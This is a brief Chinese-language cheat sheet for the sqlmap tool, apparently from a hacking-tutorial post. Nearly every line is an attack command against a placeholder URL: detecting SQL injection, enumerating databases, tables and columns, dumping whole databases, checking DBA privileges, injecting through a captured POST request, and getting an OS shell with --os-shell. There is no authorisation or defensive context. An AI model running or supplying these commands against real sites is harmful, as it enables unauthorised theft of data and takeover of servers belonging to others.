1、基本注入(这个工具kali或者bt下面有集成的,这里附加一个window免py版,提取码:3ldv)
sqlmap -u http://url/xx.php?id=1 判断注入
sqlmap -u http://url/xx.php?id=1 --dba 查找数据库
sqlmap -u http://url/xx.php?id=1 --tables -D 'db_name' 查找表
sqlmap -u http://url/xx.php?id=1 --columns -T 'table_name' 查找列
sqlmap -u http://url/xx.php?id=1 --dump -C 'column_name' 爆数据
sqlmap -u http://url/xx.php?id=1 --dump-all 脱裤(成功以后默认在bin/output目录下)
2、进阶
sqlmap -u http://url/xx.php?id=1 --is-dba 判断是否是dba权限
sqlmap -u http://url/xx.php?id=1 --users 查看用户
sqlmap -u http://url/xx.php?id=1 --privilege 判断权限
3、cookie注入
4、post注入
我们需要先将post数据包抓取下来;保存到D:/post.txt
sqlmap -u http://url/xx.php -r D:/post.txt 进行注入
注:这个网址是验证输入的网址
5、shell(这个需要知道网站目录,并且magic_quotes_off必需为off状态)
sqlmap -u http://url/xx.php?id=1 --os-cmd=command
sqlmap -u http://url/xx.php?id=1 --sql-shell
然后可以执行sql语句
sqlmap -u http://url/xx.php?id=1 --os-shell 直接获得系统的shell